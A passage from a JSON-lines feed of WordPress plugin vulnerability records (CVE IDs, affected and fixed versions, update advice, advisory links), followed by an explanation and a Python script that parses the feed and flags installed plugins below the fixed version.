ets\\\/post-grid\\\/post-grid.php#L1829\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xpro-elementor-addons\\\/trunk\\\/widgets\\\/course-grid\\\/course-grid.php#L1918\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xpro-elementor-addons\\\/trunk\\\/widgets\\\/course-grid\\\/course-grid.php#L1918\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xpro-elementor-addons\\\/trunk\\\/widgets\\\/woo-product-grid\\\/woo-product-grid.php#L3812\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xpro-elementor-addons\\\/trunk\\\/widgets\\\/woo-product-grid\\\/woo-product-grid.php#L3812\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-22813","slug":"conversational-forms","versionImpact":"1.4.2","versionEndExcluding":"1.4.3","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ChatBot for WordPress - WPBot Conversational Forms for ChatBot allows Stored XSS. This issue affects Conversational Forms for ChatBot: from n\/a through 1.4.2.","recommendation":"Update to version 1.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/conversational-forms\\\/vulnerability\\\/wordpress-chatbot-conversational-forms-plugin-1-4-2-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/conversational-forms\\\/vulnerability\\\/wordpress-chatbot-conversational-forms-plugin-1-4-2-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5164","slug":"bellows-accordion-menu","versionImpact":"1.4.2","versionEndExcluding":"1.4.3","description":"The Bellows Accordion Menu plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcodes in versions up to, and including, 1.4.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50283a4f-ea59-488a-bab0-dd6bc5718556?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50283a4f-ea59-488a-bab0-dd6bc5718556?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bellows-accordion-menu\\\/tags\\\/1.4.2\\\/includes\\\/bellows.api.php#L5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bellows-accordion-menu\\\/tags\\\/1.4.2\\\/includes\\\/bellows.api.php#L5\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bellows-accordion-menu\\\/tags\\\/1.4.2\\\/includes\\\/functions.php#L12\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bellows-accordion-menu\\\/tags\\\/1.4.2\\\/includes\\\/functions.php#L12\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10873","slug":"lastudio-element-kit","versionImpact":"1.4.2","versionEndExcluding":"1.4.3","description":"The LA-Studio Element Kit for Elementor plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.4.2 via the _load_template function. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 1.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/includes\\\/base\\\/class-widget-base.php#L118\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/includes\\\/base\\\/class-widget-base.php#L118\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/includes\\\/base\\\/class-widget-base.php#L141\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/includes\\\/base\\\/class-widget-base.php#L141\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/includes\\\/extensions\\\/albums\\\/widget-templates\\\/player\\\/global\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/includes\\\/extensions\\\/albums\\\/widget-templates\\\/player\\\/global\\\/index.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/includes\\\/extensions\\\/albums\\\/widget-templates\\\/player\\\/global\\\/index.php#L26\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/includes\\\/extensions\\\/albums\\\/widget-templates\\\/player\\\/global\\\/index.php#L26\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3194361%40lastudio-element-kit&new=3194361%40lastudio-element-kit&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3194361%40lastudio-element-kit&new=3194361%40lastudio-element-kit&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59415c36-e48a-4c05-ad22-8d55a9e13bcd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59415c36-e48a-4c05-ad22-8d55a9e13bcd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10688","slug":"attesa-extra","versionImpact":"1.4.2","versionEndExcluding":"1.4.3","description":"The Attesa Extra plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.4.2 via the 'attesa-template' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from password protected, private, or draft posts that they should not have access to.","recommendation":"Update to version 1.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a3374f89-ae63-45bb-b6a6-9689e2513e69?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a3374f89-ae63-45bb-b6a6-9689e2513e69?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3184563\\\/attesa-extra\\\/tags\\\/attesa-extra\\\/panel\\\/attesa-custom-templates.php?old=3181839&old_path=attesa-extra%2Ftags%2Fattesa-extra%2Fpanel%2Fattesa-custom-templates.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3184563\\\/attesa-extra\\\/tags\\\/attesa-extra\\\/panel\\\/attesa-custom-templates.php?old=3181839&old_path=attesa-extra%2Ftags%2Fattesa-extra%2Fpanel%2Fattesa-custom-templates.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-47181","slug":"email-templates","versionEndExcluding":"1.4.3","description":"Cross-Site Request Forgery (CSRF) vulnerability in wpexpertsio Email Templates Customizer and Designer for WordPress and WooCommerce email-templates allows Cross Site Request Forgery. This issue affects Email Templates Customizer and Designer for WordPress and WooCommerce: from n\/a through 1.4.2.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/email-templates\\\/wordpress-email-templates-plugin-1-4-2-cross-site-request-forgery-csrf?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/email-templates\\\/wordpress-email-templates-plugin-1-4-2-cross-site-request-forgery-csrf?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0379","slug":"spotlight-social-photo-feeds","versionEndExcluding":"1.4.3","description":"The Spotlight Social Feeds WordPress plugin before 1.4.3 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/14b4f0c5-c7b1-4ac4-8c9c-f8c35ca5de4a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/14b4f0c5-c7b1-4ac4-8c9c-f8c35ca5de4a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6809","slug":"simple-media-directory","versionImpact":"1.4.2","versionEndExcluding":"1.4.3","description":"The Simple Video Directory WordPress plugin before 1.4.3 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.","recommendation":"Update to version 1.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/60abcae5-4c89-4d48-95f8-6a80e5f06a37\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/60abcae5-4c89-4d48-95f8-6a80e5f06a37\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-51408","slug":"wp-optin-wheel","versionEndExcluding":"1.4.3","description":"Exposure of Sensitive Information to an Unauthorized Actor vulnerability in StudioWombat WP Optin Wheel \u2013 Gamified Optin Email Marketing Tool for WordPress and WooCommerce. This issue affects WP Optin Wheel \u2013 Gamified Optin Email Marketing Tool for WordPress and WooCommerce: from n\/a through 1.4.3.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-optin-wheel\\\/wordpress-wp-optin-wheel-plugin-1-4-3-sensitive-data-exposure-via-log-file-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-optin-wheel\\\/wordpress-wp-optin-wheel-plugin-1-4-3-sensitive-data-exposure-via-log-file-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10117","slug":"gravity-forms-dps-pxpay","versionImpact":"1.4.2","versionEndExcluding":"1.4.3","description":"A vulnerability, which was classified as problematic, was found in Gravity Forms DPS PxPay Plugin up to 1.4.2 on WordPress. Affected is an unknown function. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version 1.4.3 is able to address this issue. The name of the patch is 5966a5e6343e3d5610bdfa126a5cfbae95e629b6. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-230664.","recommendation":"Update to version 1.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/gravity-forms-dps-pxpay\\\/releases\\\/tag\\\/1.4.3\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/gravity-forms-dps-pxpay\\\/releases\\\/tag\\\/1.4.3\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/gravity-forms-dps-pxpay\\\/commit\\\/5966a5e6343e3d5610bdfa126a5cfbae95e629b6\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/gravity-forms-dps-pxpay\\\/commit\\\/5966a5e6343e3d5610bdfa126a5cfbae95e629b6\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230664\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230664\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.230664\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.230664\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11640","slug":"vikrentcar","versionImpact":"1.4.2","versionEndExcluding":"1.4.3","description":"The VikRentCar Car Rental Management System plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4.2. This is due to missing or incorrect nonce validation on the 'save' function. This makes it possible for unauthenticated attackers to change plugin access privileges via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. Successful exploitation allows attackers with subscriber-level privileges and above to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 1.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3225040\\\/vikrentcar\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3225040\\\/vikrentcar\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a4c085a-1601-4c1a-ac17-0f2cf5d02489?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a4c085a-1601-4c1a-ac17-0f2cf5d02489?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13594","slug":"simple-downloads-list","versionImpact":"1.4.2","versionEndExcluding":"1.4.3","description":"The Simple Downloads List plugin for WordPress is vulnerable to SQL Injection via the 'category' attribute of the 'neofix_sdl' shortcode in all versions up to, and including, 1.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-downloads-list\\\/trunk\\\/lists\\\/list_1\\\/download_list_1.php#L20\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-downloads-list\\\/trunk\\\/lists\\\/list_1\\\/download_list_1.php#L20\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3226486%40simple-downloads-list&new=3226486%40simple-downloads-list&sfp_email=&sfph_mail=#file14\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3226486%40simple-downloads-list&new=3226486%40simple-downloads-list&sfp_email=&sfph_mail=#file14\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49f5bb21-d18f-453b-bef4-e3b234d162c8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49f5bb21-d18f-453b-bef4-e3b234d162c8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5792","slug":"houzez-crm","versionImpact":"1.4.2","versionEndExcluding":"1.4.3","description":"The Houzez CRM plugin for WordPress is vulnerable to time-based SQL Injection via the notes \u2018belong_to\u2019 parameter in all versions up to, and including, 1.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Custom-level (seller) access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a1d4df4b-ec7a-43f6-8617-161b1600d6d2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a1d4df4b-ec7a-43f6-8617-161b1600d6d2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/favethemes.zendesk.com\\\/hc\\\/en-us\\\/articles\\\/360041639432-Changelog\",\"name\":\"https:\\\/\\\/favethemes.zendesk.com\\\/hc\\\/en-us\\\/articles\\\/360041639432-Changelog\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11776","slug":"pcrecruiter-extensions","versionImpact":"1.4.22","versionEndExcluding":"1.4.23","description":"The PCRecruiter Extensions plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'PCRecruiter' shortcode in all versions up to, and including, 1.4.10 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.4.23, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pcrecruiter-extensions\\\/trunk\\\/PCRecruiter-Extensions.php#L21\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pcrecruiter-extensions\\\/trunk\\\/PCRecruiter-Extensions.php#L21\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d97e1ec3-321b-4d69-ab69-e3ecab0937b3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d97e1ec3-321b-4d69-ab69-e3ecab0937b3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10640","slug":"woocommerce-currency-switcher","versionImpact":"1.4.2.2","versionEndExcluding":"1.4.2.3","description":"The FOX \u2013 Currency Switcher Professional for WooCommerce plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.4.2.2. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 1.4.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ceb0dffa-02a2-4193-b2c4-4774091eacfa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ceb0dffa-02a2-4193-b2c4-4774091eacfa?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3183018%40woocommerce-currency-switcher&old=3178647%40woocommerce-currency-switcher&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3183018%40woocommerce-currency-switcher&old=3178647%40woocommerce-currency-switcher&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8271","slug":"woocommerce-currency-switcher","versionImpact":"1.4.2.1","versionEndExcluding":"1.4.2.2","description":"The FOX \u2013 Currency Switcher Professional for WooCommerce plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.4.2.1. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode in the 'woocs_get_custom_price_html' function. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 1.4.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dec51bd6-2ffe-47b6-9423-6131395bf439?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dec51bd6-2ffe-47b6-9423-6131395bf439?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-currency-switcher\\\/tags\\\/1.4.2.1\\\/classes\\\/woocs.php#L4604\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-currency-switcher\\\/tags\\\/1.4.2.1\\\/classes\\\/woocs.php#L4604\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3150596%40woocommerce-currency-switcher&new=3150596%40woocommerce-currency-switcher&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3150596%40woocommerce-currency-switcher&new=3150596%40woocommerce-currency-switcher&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11189","slug":"social-share-and-social-locker-arsocial","versionImpact":"1.4.1","versionEndExcluding":"1.4.2","description":"The Social Share And Social Locker WordPress plugin before 1.4.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in a multisite setup).","recommendation":"Update to version 1.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f3d1473a-6d25-447d-af27-f315323fdd62\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f3d1473a-6d25-447d-af27-f315323fdd62\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5611","slug":"stratum","versionImpact":"1.4.1","versionEndExcluding":"1.4.2","description":"The Stratum \u2013 Elementor Widgets plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018label_years\u2019 attribute within the Countdown widget in all versions up to, and including, 1.4.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/840dd4a9-103a-4ff9-ba26-3bf5b6e831a1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/840dd4a9-103a-4ff9-ba26-3bf5b6e831a1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stratum\\\/tags\\\/1.4.0\\\/includes\\\/templates\\\/countdown.php#L66\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stratum\\\/tags\\\/1.4.0\\\/includes\\\/templates\\\/countdown.php#L66\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3102765#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3102765#file1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1166","slug":"image-hover-effects-addon-for-elementor","versionImpact":"1.4.1","versionEndExcluding":"1.4.2","description":"The Image Hover Effects \u2013 Elementor Addon plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Image Hover Effects Widget in all versions up to, and including, 1.4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3068751%40image-hover-effects-addon-for-elementor&new=3068751%40image-hover-effects-addon-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3068751%40image-hover-effects-addon-for-elementor&new=3068751%40image-hover-effects-addon-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d72a57f-9acc-43e4-af81-024bc6e0d3fd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d72a57f-9acc-43e4-af81-024bc6e0d3fd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
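Every record in this feed has the same shape: one JSON object per line with CVE_ID, slug, an optional versionImpact (last known affected version), versionEndExcluding (first fixed version), description, an optional recommendation, and a refs field that is a JSON array serialised a second time as a string (which is why the URLs appear as `https:\\\/\\\/...`). The following Python is an added example, not code from the Security Ninja plugin, showing how a consumer would read the feed, decode the nested refs, compare dotted versions of unequal length (1.4.3 against 1.4.3.1), and flag records whose version fields are missing or inconsistent before matching them against an installed-plugin inventory. The three sample records are constructed abbreviations of entries on this page, and the example.invalid URLs and the site inventory are placeholders.

```python
"""Consumer for the Security Ninja plugins_vulns.jsonl feed shown on this page.

Added example, not code from the Security Ninja plugin. Assumptions: every line is one
JSON object with the fields seen in the feed (CVE_ID, slug, versionImpact,
versionEndExcluding, description, recommendation, refs); "refs" is a JSON array
serialised a second time as a string; versionEndExcluding is the first fixed version
and versionImpact, when present, the last known affected one.
"""
from __future__ import annotations

import json
from typing import Iterator

# Constructed sample in the feed's own shape: abbreviated descriptions, but the
# double-encoded "refs" and the record without versionImpact mirror real entries.
SAMPLE_FEED = r'''
{"CVE_ID":"CVE-2024-4440","slug":"xpro-elementor-addons","versionImpact":"1.4.3","versionEndExcluding":"1.4.3.1","description":"Stored XSS via widget attributes.","recommendation":"Update to version 1.4.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/example.invalid\\\/advisory\\\/a\",\"name\":\"a\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0405","slug":"gpt3-ai-content-generator","versionEndExcluding":"1.4.38","description":"No nonce or capability check before modifying posts.","refs":"[{\"url\":\"https:\\\/\\\/example.invalid\\\/advisory\\\/b\",\"name\":\"b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10640","slug":"woocommerce-currency-switcher","versionImpact":"1.4.2.2","versionEndExcluding":"1.4.2.3","description":"Unauthenticated arbitrary shortcode execution.","recommendation":"Update to version 1.4.2.3, or a newer patched version","refs":"[]"}
'''


def parse_version(v: str) -> tuple[int, ...]:
    """'1.4.3.1' -> (1, 4, 3, 1). Non-numeric characters are dropped (assumption:
    the feed only carries dotted numeric versions)."""
    out = []
    for part in v.strip().split("."):
        digits = "".join(ch for ch in part if ch.isdigit())
        out.append(int(digits) if digits else 0)
    return tuple(out)


def version_lt(a: str, b: str) -> bool:
    """True when a < b; the shorter tuple is zero-padded so 1.4.3 == 1.4.3.0."""
    ta, tb = parse_version(a), parse_version(b)
    width = max(len(ta), len(tb))
    return ta + (0,) * (width - len(ta)) < tb + (0,) * (width - len(tb))


def parse_feed(text: str) -> Iterator[dict]:
    """Yield one record per non-empty line, with the inner "refs" JSON decoded."""
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        rec = json.loads(line)
        refs = rec.get("refs", "[]")
        rec["refs"] = json.loads(refs) if isinstance(refs, str) else refs
        yield rec


def record_warnings(rec: dict) -> list[str]:
    """Sanity checks a consumer should run before trusting a record's version fields."""
    warnings = []
    end, impact = rec.get("versionEndExcluding"), rec.get("versionImpact")
    if not end:
        warnings.append("versionEndExcluding missing")
    if not impact:
        warnings.append("versionImpact missing")
    elif end and not version_lt(impact, end):
        warnings.append("versionImpact is not below versionEndExcluding")
    return warnings


def is_affected(rec: dict, installed: str) -> bool:
    """Affected when the installed version is below the first fixed version.
    A record with no fix boundary cannot be decided and is reported as not matched."""
    end = rec.get("versionEndExcluding")
    return bool(end) and version_lt(installed, end)


def match_installed(feed_text: str, installed: dict[str, str]) -> list[dict]:
    """installed maps plugin slug -> version; returns one hit per affecting record."""
    hits = []
    for rec in parse_feed(feed_text):
        version = installed.get(rec["slug"])
        if version is None or not is_affected(rec, version):
            continue
        hits.append({
            "cve": rec["CVE_ID"],
            "slug": rec["slug"],
            "installed": version,
            "fixed_in": rec["versionEndExcluding"],
            "refs": [r["url"] for r in rec["refs"]],
            "warnings": record_warnings(rec),
        })
    return hits


if __name__ == "__main__":
    # Hypothetical site inventory; the slugs match the sample records above.
    site = {"xpro-elementor-addons": "1.4.3",
            "gpt3-ai-content-generator": "1.4.0",
            "woocommerce-currency-switcher": "1.4.2.3"}
    for hit in match_installed(SAMPLE_FEED, site):
        print(f"{hit['cve']}: {hit['slug']} {hit['installed']} (fix in {hit['fixed_in']})"
              + (f"  warnings: {hit['warnings']}" if hit["warnings"] else ""))
```

The match deliberately keys on versionEndExcluding alone: it is the boundary a patched release actually moves, whereas versionImpact is only the last version the reporter tested, so a record where the two disagree (or where versionImpact is absent, as in several Patchstack- and WPScan-sourced entries above) is surfaced as a warning rather than silently trusted.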
